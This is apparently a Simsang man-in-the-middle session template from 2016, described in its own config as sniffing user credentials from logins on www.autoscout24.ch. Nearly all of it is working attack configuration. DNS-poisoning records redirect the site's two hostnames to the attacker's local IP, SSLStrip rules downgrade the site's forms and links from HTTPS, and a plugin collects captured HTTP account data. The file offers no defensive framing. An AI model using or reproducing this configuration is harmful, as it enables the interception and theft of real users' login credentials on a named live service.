	<SessionTemplate>


   <Config>
     <Name>www.autoscout24.ch user login</Name>
     <Description>Sniffing user credentials from login attempt on www.autoscout24.ch</Description>
     <Timestamp>2016-02-03</Timestamp>
     <Author>Simsang</Author>
     <Reference>http://buglist.io/ </Reference>
   </Config>

   </Hops>
     <Hop>
      <Host>GET http://www.autoscout24.ch</Host>
      <Description>User typed URL in browser</Description>
     </Hop> 
     <Hop>  
      <Host>GET https://www.autoscout24.ch</Host>
      <Description>User clicked on login link</Description>
     </Hop> 
     <Hop>  
      <Host>POST https://www.autoscout24.ch</Host>
      <Description>User clicked on login link</Description>
     </Hop> 
   </Hops>
   
   
<Plugins>
<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <DNSPoisonRecord>
    <HostName>www.autoscout24.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>autoscout24.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
</ArrayOfDNSPoisonRecord>
</Plugin>
<Plugin name="HTTP accounts" dirname="HTTPAccounts">

<PluginData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Records />
</PluginData>
</Plugin>
<Plugin name="SSLStrip" dirname="SSLStrip">

<ArrayOfSSLStripRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SSLStripRecord>
    <HostName>www.autoscout24.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.autoscout24.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>autoscout24.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>autoscout24.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
</ArrayOfSSLStripRecord>
</Plugin>

</Plugins>
</SessionTemplate>
